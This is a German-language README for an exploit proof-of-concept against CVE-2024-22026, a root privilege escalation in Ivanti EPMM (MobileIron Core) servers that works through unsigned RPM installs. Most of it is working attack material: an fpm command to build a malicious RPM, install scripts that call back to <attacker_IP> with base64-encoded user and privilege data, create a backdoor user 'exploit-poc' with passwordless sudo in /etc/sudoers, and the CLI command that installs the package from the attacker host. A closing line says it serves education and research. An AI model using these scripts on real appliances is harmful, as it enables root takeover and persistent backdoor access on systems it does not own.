
Exploit-POC für CVE-2024-22026, der Ivanti EPMM „MobileIron Core" betrifft
Exploit POC für CVE-2024-22026, der Ivanti EPMM "MobileIron Core" betrifft

CVE-2024-22026 ist eine lokale Rechteausweitung-Schwachstelle in Ivanti EPMM (ehemals MobileIron) Serverversionen vor 12.1.0.0, 12.0.0.0 und 11.12.0.1. Diese Schwachstelle ermöglicht es einem lokalen Angreifer, Root-Zugriff auf das System zu erlangen, indem er den Software-Update-Prozess mit einem bösartigen RPM-Paket von einer entfernten URL ausnutzt.
Lesen Sie den vollständigen Blogbeitrag für detaillierte technische Informationen: Exploitieren von CVE-2024-22026: Rooten von Ivanti EPMM (MobileIron Core)
Während unserer Forschung haben wir entdeckt, dass die Appliance den folgenden Befehl verwendet, um RPM-Pakete als Benutzer mit geringen Rechten abzurufen und zu installieren:
install rpm url <remote url>
Der obige Befehl ist nur ein CLI-Wrapper für den folgenden Vorgang, der als Root ausgeführt wird:
/bin/rpm -Uvh *.rpm
Dieser zugrunde liegende rpm-Befehl erzwingt weder eine Signaturprüfung noch eine URL-Filterung, was bedeutet, dass jedes RPM-Paket installiert werden kann. Dadurch kann ein Angreifer ein bösartiges RPM-Paket fälschen und ausliefern, das die Appliance kompromittieren kann.
Der folgende Befehl wird verwendet, um ein bösartiges RPM-Paket zu erstellen:
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
preinstall.sh)#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0
postinstall.sh)#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo "Failed to add user 'exploit-poc'" >&2
exit 1
fi
echo "exploit-poc:<redacted_password>" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
echo "Failed to modify sudoers file" >&2
exit 1
fi
exit 0
Um die Schwachstelle auszunutzen, würde der Angreifer den folgenden Befehl in der CLI ausführen, um das bösartige RPM abzurufen und zu installieren:
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm
Ivanti hat Patches veröffentlicht, um CVE-2024-22026 in den folgenden Versionen zu beheben:
Dieses Repository und sein Inhalt dienen ausschließlich Bildungs- und Forschungszwecken. Die Nutzung der hierin enthaltenen Informationen erfolgt auf eigenes Risiko.